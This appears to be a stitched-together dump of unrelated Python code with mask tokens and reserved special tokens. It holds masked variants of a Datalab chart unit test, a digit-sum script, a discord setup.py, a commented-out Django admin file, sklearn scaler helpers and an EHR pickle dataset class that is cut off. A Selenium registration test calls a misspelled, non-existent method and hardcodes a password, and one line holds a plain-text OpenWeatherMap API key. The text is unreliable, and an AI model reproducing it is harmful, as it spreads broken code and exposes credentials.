"step-1": "<mask token>\n\n\nclass TestCases(unittest.TestCase):\n\n def test_chart_cell(self):\n t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA',\n 'quantity': 50}]\n IPython.get_ipython().user_ns = {}\n chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo',\n 'data': t, 'fields': None}, '')\n self.assertTrue(chart.find('charts.render(') > 0)\n self.assertTrue(chart.find(\"'geo'\") > 0)\n self.assertTrue(chart.find('\"fields\": \"*\"') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"US\"}, {\"v\": 100}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 100}, {\"v\": \"US\"}]}') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"ZA\"}, {\"v\": 50}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 50}, {\"v\": \"ZA\"}]}') > 0)\n\n def test_chart_magic(self):\n pass\n",
"step-2": "<mask token>\n\n\ndef noop_decorator(func):\n return func\n\n\n<mask token>\n\n\nclass TestCases(unittest.TestCase):\n\n def test_chart_cell(self):\n t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA',\n 'quantity': 50}]\n IPython.get_ipython().user_ns = {}\n chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo',\n 'data': t, 'fields': None}, '')\n self.assertTrue(chart.find('charts.render(') > 0)\n self.assertTrue(chart.find(\"'geo'\") > 0)\n self.assertTrue(chart.find('\"fields\": \"*\"') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"US\"}, {\"v\": 100}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 100}, {\"v\": \"US\"}]}') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"ZA\"}, {\"v\": 50}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 50}, {\"v\": \"ZA\"}]}') > 0)\n\n def test_chart_magic(self):\n pass\n",
"step-3": "<mask token>\n\n\ndef noop_decorator(func):\n return func\n\n\nIPython.core.magic.register_line_cell_magic = noop_decorator\nIPython.core.magic.register_line_magic = noop_decorator\nIPython.core.magic.register_cell_magic = noop_decorator\nIPython.core.display.HTML = lambda x: x\nIPython.core.display.JSON = lambda x: x\n\n\nclass TestCases(unittest.TestCase):\n\n def test_chart_cell(self):\n t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA',\n 'quantity': 50}]\n IPython.get_ipython().user_ns = {}\n chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo',\n 'data': t, 'fields': None}, '')\n self.assertTrue(chart.find('charts.render(') > 0)\n self.assertTrue(chart.find(\"'geo'\") > 0)\n self.assertTrue(chart.find('\"fields\": \"*\"') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"US\"}, {\"v\": 100}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 100}, {\"v\": \"US\"}]}') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"ZA\"}, {\"v\": 50}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 50}, {\"v\": \"ZA\"}]}') > 0)\n\n def test_chart_magic(self):\n pass\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import unicode_literals\nimport unittest\nimport IPython.core.display\nimport IPython.core.magic\nimport datalab.utils.commands\n\n\ndef noop_decorator(func):\n return func\n\n\nIPython.core.magic.register_line_cell_magic = noop_decorator\nIPython.core.magic.register_line_magic = noop_decorator\nIPython.core.magic.register_cell_magic = noop_decorator\nIPython.core.display.HTML = lambda x: x\nIPython.core.display.JSON = lambda x: x\n\n\nclass TestCases(unittest.TestCase):\n\n def test_chart_cell(self):\n t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA',\n 'quantity': 50}]\n IPython.get_ipython().user_ns = {}\n chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo',\n 'data': t, 'fields': None}, '')\n self.assertTrue(chart.find('charts.render(') > 0)\n self.assertTrue(chart.find(\"'geo'\") > 0)\n self.assertTrue(chart.find('\"fields\": \"*\"') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"US\"}, {\"v\": 100}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 100}, {\"v\": \"US\"}]}') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"ZA\"}, {\"v\": 50}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 50}, {\"v\": \"ZA\"}]}') > 0)\n\n def test_chart_magic(self):\n pass\n",
"step-5": "# Copyright 2015 Google Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except\n# in compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing permissions and limitations under\n# the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nimport unittest\n\n# import Python so we can mock the parts we need to here.\nimport IPython.core.display\nimport IPython.core.magic\n\nimport datalab.utils.commands\n\n\ndef noop_decorator(func):\n return func\n\n\nIPython.core.magic.register_line_cell_magic = noop_decorator\nIPython.core.magic.register_line_magic = noop_decorator\nIPython.core.magic.register_cell_magic = noop_decorator\nIPython.core.display.HTML = lambda x: x\nIPython.core.display.JSON = lambda x: x\n\n\nclass TestCases(unittest.TestCase):\n\n def test_chart_cell(self):\n t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA', 'quantity': 50}]\n IPython.get_ipython().user_ns = {}\n chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo', 'data': t, 'fields': None},\n '')\n self.assertTrue(chart.find('charts.render(') > 0)\n self.assertTrue(chart.find('\\'geo\\'') > 0)\n self.assertTrue(chart.find('\"fields\": \"*\"') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"US\"}, {\"v\": 100}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 100}, {\"v\": \"US\"}]}') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"ZA\"}, {\"v\": 50}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 50}, {\"v\": \"ZA\"}]}') > 0)\n\n def test_chart_magic(self):\n # TODO(gram): complete this test\n pass\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(int(first_digit) + int(second_digit))
<|reserved_special_token_1|>
two_digit_number = input('Type a two digit number: ')
first_digit = two_digit_number[0]
second_digit = two_digit_number[1]
print(int(first_digit) + int(second_digit))
<|reserved_special_token_1|>
two_digit_number=input("Type a two digit number: ")
first_digit=two_digit_number[0]
second_digit=two_digit_number[1]
print(int(first_digit)+int(second_digit))
|
flexible
|
{
"blob_id": "7d65e4e925e90d6b013ae2c059cde58538884d22",
"index": 7239,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(int(first_digit) + int(second_digit))\n",
"step-3": "two_digit_number = input('Type a two digit number: ')\nfirst_digit = two_digit_number[0]\nsecond_digit = two_digit_number[1]\nprint(int(first_digit) + int(second_digit))\n",
"step-4": "\r\ntwo_digit_number=input(\"Type a two digit number: \")\r\nfirst_digit=two_digit_number[0]\r\nsecond_digit=two_digit_number[1]\r\nprint(int(first_digit)+int(second_digit))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='discord-ext-menus', author='TierGamerpy', url=
'https://github.com/TierGamerpy/discord-ext-menus', version=0.1,
packages=['discord.ext.menus'], description=
'An extension module to make reaction based menus with discord.py',
install_requires=['discord.py>=1.2.5'], python_requires='>=3.5.3')
<|reserved_special_token_1|>
from setuptools import setup
setup(name='discord-ext-menus', author='TierGamerpy', url=
'https://github.com/TierGamerpy/discord-ext-menus', version=0.1,
packages=['discord.ext.menus'], description=
'An extension module to make reaction based menus with discord.py',
install_requires=['discord.py>=1.2.5'], python_requires='>=3.5.3')
|
flexible
|
{
"blob_id": "daa287eeb967d47c9a8420beccf531d9c157e925",
"index": 3217,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='discord-ext-menus', author='TierGamerpy', url=\n 'https://github.com/TierGamerpy/discord-ext-menus', version=0.1,\n packages=['discord.ext.menus'], description=\n 'An extension module to make reaction based menus with discord.py',\n install_requires=['discord.py>=1.2.5'], python_requires='>=3.5.3')\n",
"step-3": "from setuptools import setup\nsetup(name='discord-ext-menus', author='TierGamerpy', url=\n 'https://github.com/TierGamerpy/discord-ext-menus', version=0.1,\n packages=['discord.ext.menus'], description=\n 'An extension module to make reaction based menus with discord.py',\n install_requires=['discord.py>=1.2.5'], python_requires='>=3.5.3')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django.contrib import admin
# from .models import Usuario
# from .models import Lote
# from .models import Fornecedor
# from .models import Cliente
# from .models import Medicamento
# from .models import Medicamento_Entrada
# from .models import Medicamento_Saida
# Register your models here.
#
# class UsuarioAdmin(admin.ModelAdmin):
# list_display = ['nome','login','senha']
# class FornecedorAdmin(admin.ModelAdmin):
# list_display = ['nome','contato']
# class LoteAdmin(admin.ModelAdmin):
# list_display = ['numero','fornecedor','fabricacao','vencimento']
# class ClienteAdmin(admin.ModelAdmin):
# list_display = ['nome','contato']
# class MedicamentoAdmin(admin.ModelAdmin):
# list_display = ['nome','data_insercao','descricao']
# class Medicamento_EntradaAdmin(admin.ModelAdmin):
# list_display = ['medicamento','lote','quantidade','data_entrada','usuario']
# class Medicamento_SaidaAdmin(admin.ModelAdmin):
# list_display = ['medicamento','quantidade','data_saida','usuario']
# admin.site.register(Usuario,UsuarioAdmin)
# admin.site.register(Lote,LoteAdmin)
# admin.site.register(Fornecedor,FornecedorAdmin)
# admin.site.register(Cliente,ClienteAdmin)
# admin.site.register(Medicamento,MedicamentoAdmin)
# admin.site.register(Medicamento_Entrada,Medicamento_EntradaAdmin)
# admin.site.register(Medicamento_Saida,Medicamento_SaidaAdmin)
|
normal
|
{
"blob_id": "63a2258bf0ed779254b68a683e3d30e9fb356b1f",
"index": 139,
"step-1": "<mask token>\n",
"step-2": "from django.contrib import admin\n",
"step-3": "from django.contrib import admin\n# from .models import Usuario\n# from .models import Lote\n# from .models import Fornecedor\n# from .models import Cliente\n# from .models import Medicamento\n# from .models import Medicamento_Entrada\n# from .models import Medicamento_Saida\n# Register your models here.\n#\n# class UsuarioAdmin(admin.ModelAdmin):\n# \tlist_display = ['nome','login','senha']\n\n# class FornecedorAdmin(admin.ModelAdmin):\n# \tlist_display = ['nome','contato']\n\n# class LoteAdmin(admin.ModelAdmin):\n# \tlist_display = ['numero','fornecedor','fabricacao','vencimento']\n\n# class ClienteAdmin(admin.ModelAdmin):\n# \tlist_display = ['nome','contato']\n\n# class MedicamentoAdmin(admin.ModelAdmin):\n# \tlist_display = ['nome','data_insercao','descricao']\n\n# class Medicamento_EntradaAdmin(admin.ModelAdmin):\n# \tlist_display = ['medicamento','lote','quantidade','data_entrada','usuario']\n\n# class Medicamento_SaidaAdmin(admin.ModelAdmin):\n# \tlist_display = ['medicamento','quantidade','data_saida','usuario']\n\n\n# admin.site.register(Usuario,UsuarioAdmin)\n# admin.site.register(Lote,LoteAdmin)\n# admin.site.register(Fornecedor,FornecedorAdmin)\n# admin.site.register(Cliente,ClienteAdmin)\n# admin.site.register(Medicamento,MedicamentoAdmin)\n# admin.site.register(Medicamento_Entrada,Medicamento_EntradaAdmin)\n# admin.site.register(Medicamento_Saida,Medicamento_SaidaAdmin)",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
def test_register_new_accont(self):
cos = self.cos
cos.get("https://wizzair.com/pl-pl#/")
cos.find_elements_by_class_name('navigation__button navigation__button--simple').click()
cos.find_elements_by_class_name('content__link1').click()
cos.find_elemebts_by_name('firstName').click()
cos.find_elemebts_by_name('firstName').clear()
cos.find_elemebts_by_name('firstName').send_keys("Jonasz")
cos.find_elemebts_by_name('lastName').click()
cos.find_elemebts_by_name('lastName').clear()
cos.find_elemebts_by_name('lastName').send_keys("Zsanoj")
cos.find_elements_by_class_name('rf-switch__label').click()
cos.find_elemebts_by_name('mobilePhone').click()
cos.find_elemebts_by_name('mobilePhone').clear()
cos.find_elemebts_by_name('mobilePhone').send_keys('71661234567')
cos.find_elemebts_by_name('email').click()
cos.find_elemebts_by_name('email').clear()
cos.find_elemebts_by_name('email').send_keys('[email protected]')
cos.find_elemebts_by_name('password').click()
cos.find_elemebts_by_name('password').clear()
cos.find_elemebts_by_name('password').send_keys('zaq1@WSX')
cos.find_elements_by_class_name('rf-input__input rf-input__input--empty').click()
|
normal
|
{
"blob_id": "6efd22feb4f96de74633276b1ec8550f8d853075",
"index": 2657,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_register_new_accont(self):\n cos = self.cos\n cos.get('https://wizzair.com/pl-pl#/')\n cos.find_elements_by_class_name(\n 'navigation__button navigation__button--simple').click()\n cos.find_elements_by_class_name('content__link1').click()\n cos.find_elemebts_by_name('firstName').click()\n cos.find_elemebts_by_name('firstName').clear()\n cos.find_elemebts_by_name('firstName').send_keys('Jonasz')\n cos.find_elemebts_by_name('lastName').click()\n cos.find_elemebts_by_name('lastName').clear()\n cos.find_elemebts_by_name('lastName').send_keys('Zsanoj')\n cos.find_elements_by_class_name('rf-switch__label').click()\n cos.find_elemebts_by_name('mobilePhone').click()\n cos.find_elemebts_by_name('mobilePhone').clear()\n cos.find_elemebts_by_name('mobilePhone').send_keys('71661234567')\n cos.find_elemebts_by_name('email').click()\n cos.find_elemebts_by_name('email').clear()\n cos.find_elemebts_by_name('email').send_keys('[email protected]')\n cos.find_elemebts_by_name('password').click()\n cos.find_elemebts_by_name('password').clear()\n cos.find_elemebts_by_name('password').send_keys('zaq1@WSX')\n cos.find_elements_by_class_name('rf-input__input rf-input__input--empty'\n ).click()\n",
"step-3": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n\ndef test_register_new_accont(self):\n cos = self.cos\n cos.get('https://wizzair.com/pl-pl#/')\n cos.find_elements_by_class_name(\n 'navigation__button navigation__button--simple').click()\n cos.find_elements_by_class_name('content__link1').click()\n cos.find_elemebts_by_name('firstName').click()\n cos.find_elemebts_by_name('firstName').clear()\n cos.find_elemebts_by_name('firstName').send_keys('Jonasz')\n cos.find_elemebts_by_name('lastName').click()\n cos.find_elemebts_by_name('lastName').clear()\n cos.find_elemebts_by_name('lastName').send_keys('Zsanoj')\n cos.find_elements_by_class_name('rf-switch__label').click()\n cos.find_elemebts_by_name('mobilePhone').click()\n cos.find_elemebts_by_name('mobilePhone').clear()\n cos.find_elemebts_by_name('mobilePhone').send_keys('71661234567')\n cos.find_elemebts_by_name('email').click()\n cos.find_elemebts_by_name('email').clear()\n cos.find_elemebts_by_name('email').send_keys('[email protected]')\n cos.find_elemebts_by_name('password').click()\n cos.find_elemebts_by_name('password').clear()\n cos.find_elemebts_by_name('password').send_keys('zaq1@WSX')\n cos.find_elements_by_class_name('rf-input__input rf-input__input--empty'\n ).click()\n",
"step-4": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\ndef test_register_new_accont(self):\n cos = self.cos\n cos.get(\"https://wizzair.com/pl-pl#/\")\n cos.find_elements_by_class_name('navigation__button navigation__button--simple').click()\n cos.find_elements_by_class_name('content__link1').click()\n cos.find_elemebts_by_name('firstName').click()\n cos.find_elemebts_by_name('firstName').clear()\n cos.find_elemebts_by_name('firstName').send_keys(\"Jonasz\")\n cos.find_elemebts_by_name('lastName').click()\n cos.find_elemebts_by_name('lastName').clear()\n cos.find_elemebts_by_name('lastName').send_keys(\"Zsanoj\")\n cos.find_elements_by_class_name('rf-switch__label').click()\n cos.find_elemebts_by_name('mobilePhone').click()\n cos.find_elemebts_by_name('mobilePhone').clear()\n cos.find_elemebts_by_name('mobilePhone').send_keys('71661234567')\n cos.find_elemebts_by_name('email').click()\n cos.find_elemebts_by_name('email').clear()\n cos.find_elemebts_by_name('email').send_keys('[email protected]')\n cos.find_elemebts_by_name('password').click()\n cos.find_elemebts_by_name('password').clear()\n cos.find_elemebts_by_name('password').send_keys('zaq1@WSX')\n cos.find_elements_by_class_name('rf-input__input rf-input__input--empty').click()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if a >= 0:
if c >= 0:
ans = b * d
elif d >= 0:
ans = b * d
else:
ans = a * d
elif b >= 0:
if c >= 0:
ans = b * d
elif d >= 0:
ans = max(b * d, a * c)
else:
ans = a * c
elif c >= 0:
ans = b * c
elif d >= 0:
ans = a * c
else:
ans = a * c
print(ans)
<|reserved_special_token_1|>
a, b, c, d = map(int, input().split())
ans = 0
if a >= 0:
if c >= 0:
ans = b * d
elif d >= 0:
ans = b * d
else:
ans = a * d
elif b >= 0:
if c >= 0:
ans = b * d
elif d >= 0:
ans = max(b * d, a * c)
else:
ans = a * c
elif c >= 0:
ans = b * c
elif d >= 0:
ans = a * c
else:
ans = a * c
print(ans)
<|reserved_special_token_1|>
a,b,c,d=map(int,input().split())
ans=0
if a>=0:
if c>=0:
ans=b*d
elif d>=0:
ans=b*d
else:
ans=a*d
elif b>=0:
if c>=0:
ans=b*d
elif d>=0:
ans=max(b*d,a*c)
else:
ans=a*c
else:
if c>=0:
ans=b*c
elif d>=0:
ans=a*c
else:
ans=a*c
print(ans)
|
flexible
|
{
"blob_id": "be37a7596850050af58f735e60bdf13594715caf",
"index": 4928,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif a >= 0:\n if c >= 0:\n ans = b * d\n elif d >= 0:\n ans = b * d\n else:\n ans = a * d\nelif b >= 0:\n if c >= 0:\n ans = b * d\n elif d >= 0:\n ans = max(b * d, a * c)\n else:\n ans = a * c\nelif c >= 0:\n ans = b * c\nelif d >= 0:\n ans = a * c\nelse:\n ans = a * c\nprint(ans)\n",
"step-3": "a, b, c, d = map(int, input().split())\nans = 0\nif a >= 0:\n if c >= 0:\n ans = b * d\n elif d >= 0:\n ans = b * d\n else:\n ans = a * d\nelif b >= 0:\n if c >= 0:\n ans = b * d\n elif d >= 0:\n ans = max(b * d, a * c)\n else:\n ans = a * c\nelif c >= 0:\n ans = b * c\nelif d >= 0:\n ans = a * c\nelse:\n ans = a * c\nprint(ans)\n",
"step-4": "a,b,c,d=map(int,input().split())\nans=0\nif a>=0:\n if c>=0:\n ans=b*d\n elif d>=0:\n ans=b*d\n else:\n ans=a*d\nelif b>=0:\n if c>=0:\n ans=b*d\n elif d>=0:\n ans=max(b*d,a*c)\n else:\n ans=a*c\nelse:\n if c>=0:\n ans=b*c\n elif d>=0:\n ans=a*c\n else:\n ans=a*c\nprint(ans)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import PowerTransformer
from sklearn.preprocessing import RobustScaler
from sklearn.preprocessing import Normalizer
from sklearn.preprocessing import MinMaxScaler
import pandas as pd
import numpy as np
def preprocess_transformers(y_train, transf):
if transf != 'ln':
if transf == 'minmax':
scaler = MinMaxScaler()
scaler2 = MinMaxScaler()
elif transf == 'standard':
scaler = StandardScaler()
scaler2 = StandardScaler()
elif transf == 'robust':
scaler = RobustScaler()
scaler2 = RobustScaler()
elif transf == 'boxcox':
scaler = PowerTransformer(method='yeo-johnson')
scaler2 = PowerTransformer(method='yeo-johnson')
mm_scaler2 = scaler2.fit(y_train)
y_train = mm_scaler2.transform(y_train)
else:
# y_train = y_train.values
y_train = np.log(y_train).values
mm_scaler2 = ''
return y_train, mm_scaler2
def transformacion_inversa(y_predict, mm_scaler2):
if mm_scaler2 != '':
y_predict = mm_scaler2.inverse_transform(pd.DataFrame(y_predict))
else:
y_predict = np.exp(y_predict)
# y_predict = y_predict
return y_predict
def predict_model(config, model):
if type(config) == dict:
df = pd.DataFrame(config, index=[0])
else:
df = config
print(f'df: {df}')
# prepared_df, scaler = preprocess_transformers(df, 'minmax')
prepared_df = df
y_pred = model.predict(prepared_df)
print(f'y_pred {y_pred}')
# print(f'scaler {scaler}')
return y_pred
# return 1
|
normal
|
{
"blob_id": "890d50c741ffd576312c63dc450e274b4517bf12",
"index": 9856,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef preprocess_transformers(y_train, transf):\n if transf != 'ln':\n if transf == 'minmax':\n scaler = MinMaxScaler()\n scaler2 = MinMaxScaler()\n elif transf == 'standard':\n scaler = StandardScaler()\n scaler2 = StandardScaler()\n elif transf == 'robust':\n scaler = RobustScaler()\n scaler2 = RobustScaler()\n elif transf == 'boxcox':\n scaler = PowerTransformer(method='yeo-johnson')\n scaler2 = PowerTransformer(method='yeo-johnson')\n mm_scaler2 = scaler2.fit(y_train)\n y_train = mm_scaler2.transform(y_train)\n else:\n y_train = np.log(y_train).values\n mm_scaler2 = ''\n return y_train, mm_scaler2\n\n\ndef transformacion_inversa(y_predict, mm_scaler2):\n if mm_scaler2 != '':\n y_predict = mm_scaler2.inverse_transform(pd.DataFrame(y_predict))\n else:\n y_predict = np.exp(y_predict)\n return y_predict\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef preprocess_transformers(y_train, transf):\n if transf != 'ln':\n if transf == 'minmax':\n scaler = MinMaxScaler()\n scaler2 = MinMaxScaler()\n elif transf == 'standard':\n scaler = StandardScaler()\n scaler2 = StandardScaler()\n elif transf == 'robust':\n scaler = RobustScaler()\n scaler2 = RobustScaler()\n elif transf == 'boxcox':\n scaler = PowerTransformer(method='yeo-johnson')\n scaler2 = PowerTransformer(method='yeo-johnson')\n mm_scaler2 = scaler2.fit(y_train)\n y_train = mm_scaler2.transform(y_train)\n else:\n y_train = np.log(y_train).values\n mm_scaler2 = ''\n return y_train, mm_scaler2\n\n\ndef transformacion_inversa(y_predict, mm_scaler2):\n if mm_scaler2 != '':\n y_predict = mm_scaler2.inverse_transform(pd.DataFrame(y_predict))\n else:\n y_predict = np.exp(y_predict)\n return y_predict\n\n\ndef predict_model(config, model):\n if type(config) == dict:\n df = pd.DataFrame(config, index=[0])\n else:\n df = config\n print(f'df: {df}')\n prepared_df = df\n y_pred = model.predict(prepared_df)\n print(f'y_pred {y_pred}')\n return y_pred\n",
"step-4": "from sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import PowerTransformer\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\nimport numpy as np\n\n\ndef preprocess_transformers(y_train, transf):\n if transf != 'ln':\n if transf == 'minmax':\n scaler = MinMaxScaler()\n scaler2 = MinMaxScaler()\n elif transf == 'standard':\n scaler = StandardScaler()\n scaler2 = StandardScaler()\n elif transf == 'robust':\n scaler = RobustScaler()\n scaler2 = RobustScaler()\n elif transf == 'boxcox':\n scaler = PowerTransformer(method='yeo-johnson')\n scaler2 = PowerTransformer(method='yeo-johnson')\n mm_scaler2 = scaler2.fit(y_train)\n y_train = mm_scaler2.transform(y_train)\n else:\n y_train = np.log(y_train).values\n mm_scaler2 = ''\n return y_train, mm_scaler2\n\n\ndef transformacion_inversa(y_predict, mm_scaler2):\n if mm_scaler2 != '':\n y_predict = mm_scaler2.inverse_transform(pd.DataFrame(y_predict))\n else:\n y_predict = np.exp(y_predict)\n return y_predict\n\n\ndef predict_model(config, model):\n if type(config) == dict:\n df = pd.DataFrame(config, index=[0])\n else:\n df = config\n print(f'df: {df}')\n prepared_df = df\n y_pred = model.predict(prepared_df)\n print(f'y_pred {y_pred}')\n return y_pred\n",
"step-5": "from sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import PowerTransformer\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\nimport numpy as np\n\n\ndef preprocess_transformers(y_train, transf):\n if transf != 'ln':\n if transf == 'minmax':\n scaler = MinMaxScaler()\n scaler2 = MinMaxScaler()\n elif transf == 'standard':\n scaler = StandardScaler()\n scaler2 = StandardScaler()\n elif transf == 'robust':\n scaler = RobustScaler()\n scaler2 = RobustScaler()\n elif transf == 'boxcox':\n scaler = PowerTransformer(method='yeo-johnson')\n scaler2 = PowerTransformer(method='yeo-johnson')\n\n mm_scaler2 = scaler2.fit(y_train)\n y_train = mm_scaler2.transform(y_train)\n else:\n # y_train = y_train.values\n y_train = np.log(y_train).values\n mm_scaler2 = ''\n\n return y_train, mm_scaler2\n\n\ndef transformacion_inversa(y_predict, mm_scaler2):\n if mm_scaler2 != '':\n y_predict = mm_scaler2.inverse_transform(pd.DataFrame(y_predict))\n else:\n y_predict = np.exp(y_predict)\n # y_predict = y_predict\n\n return y_predict\n\n\ndef predict_model(config, model):\n if type(config) == dict:\n df = pd.DataFrame(config, index=[0])\n else:\n df = config\n\n print(f'df: {df}')\n # prepared_df, scaler = preprocess_transformers(df, 'minmax')\n\n prepared_df = df\n y_pred = model.predict(prepared_df)\n\n print(f'y_pred {y_pred}')\n # print(f'scaler {scaler}')\n\n return y_pred\n # return 1\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
# OpenWeatherMap API Key
api_key = "078c8443640961d5ce547c8269db5fd7"
|
normal
|
{
"blob_id": "4eb3d94a5fd22fc29000ec32475de9cbae1c183a",
"index": 5255,
"step-1": "<mask token>\n",
"step-2": "api_key = '078c8443640961d5ce547c8269db5fd7'\n",
"step-3": "# OpenWeatherMap API Key\napi_key = \"078c8443640961d5ce547c8269db5fd7\"\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# coding: utf-8
"""
Created on Mon Oct 29 12:57:40 2018
@authors Jzhu, Lrasmy , Xin128 @ DeguiZhi Lab - UTHealth SBMI
Last updated Feb 20 2020
"""
#general utilities
from __future__ import print_function, division
from tabulate import tabulate
import numpy as np
import random
import matplotlib.pyplot as plt
try:
import cPickle as pickle
except:
import pickle
import warnings
from torch.autograd import Variable
import torch.nn.functional as F
import torch.nn as nn
warnings.filterwarnings("ignore")
plt.ion()
#torch libraries
import torch
from torch.utils.data import Dataset, DataLoader
use_cuda = torch.cuda.is_available()
#use_cuda=False
# Dataset class loaded from pickles
class EHRdataFromPickles(Dataset):
def __init__(self, root_dir, file = None, transform=None, sort = True, model='RNN', test_ratio = 0, valid_ratio = 0):
"""
Args:
1) root_dir (string): Path to pickled file(s).
The directory contains the directory to file(s): specify 'file'
please create separate instances from this object if your data is split into train, validation and test files.
2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))
[310062,
0,
[[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],
[[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],
[[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]
where 310062: patient id,
0: no heart failure
[0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.
3)transform (optional): Optional transform to be applied on a sample. Data augmentation related.
4)test_ratio, valid_ratio: ratios for splitting the data if needed.
"""
self.file = None
if file != None:
self.file = file
self.data = pickle.load(open(root_dir + file, 'rb'), encoding='bytes')
if sort:
self.data.sort(key=lambda pt:len(pt[2]),reverse=True)
self.test_ratio = test_ratio
self.valid_ratio = valid_ratio
else:
print('No file specified')
self.root_dir = root_dir
self.transform = transform
def __splitdata__(self, sort = True):
random.seed(3)
random.shuffle(self.data)
dataSize = len(self.data)
nTest = int(self.test_ratio * dataSize)
nValid = int(self.valid_ratio * dataSize)
test= self.data[:nTest]
valid = self.data[nTest:nTest+nValid]
train = self.data[nTest+nValid:]
if sort:
#sort train, validation and test again
test.sort(key=lambda pt:len(pt[2]),reverse=True)
valid.sort(key=lambda pt:len(pt[2]),reverse=True)
train.sort(key=lambda pt:len(pt[2]),reverse=True)
return train, test, valid
def __getitem__(self, idx, seeDescription = False):
'''
Return the patient data of index: idx of a 4-layer list
patient_id (pt_sk);
label: 0 for no, 1 for yes;
visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];
visit_codes: codes for each visit.
'''
if self.file != None:
sample = self.data[idx]
else:
print('No file specified')
if self.transform:
sample = self.transform(sample)
vistc = np.asarray(sample[2])
desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time': vistc[:,0],'visit_codes':vistc[:,1]}
if seeDescription:
'''
if this is True:
You will get a descriptipn of what each part of data stands for
'''
print(tabulate([['patient_id', desc['patient_id']], ['label', desc['label']],
['visit_time', desc['visit_time']], ['visit_codes', desc['visit_codes']]],
headers=['data_description', 'data'], tablefmt='orgtbl'))
#print('\n Raw sample of index :', str(idx))
return sample
def __len__(self):
'''
just the length of data
'''
if self.file != None:
return len(self.data)
else:
print('No file specified')
# Dataset class from already loaded pickled lists
class EHRdataFromLoadedPickles(Dataset):
def __init__(self, loaded_list, transform=None, sort = True, model='RNN'):
"""
Args:
1) loaded_list from pickled file
2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))
[310062,
0,
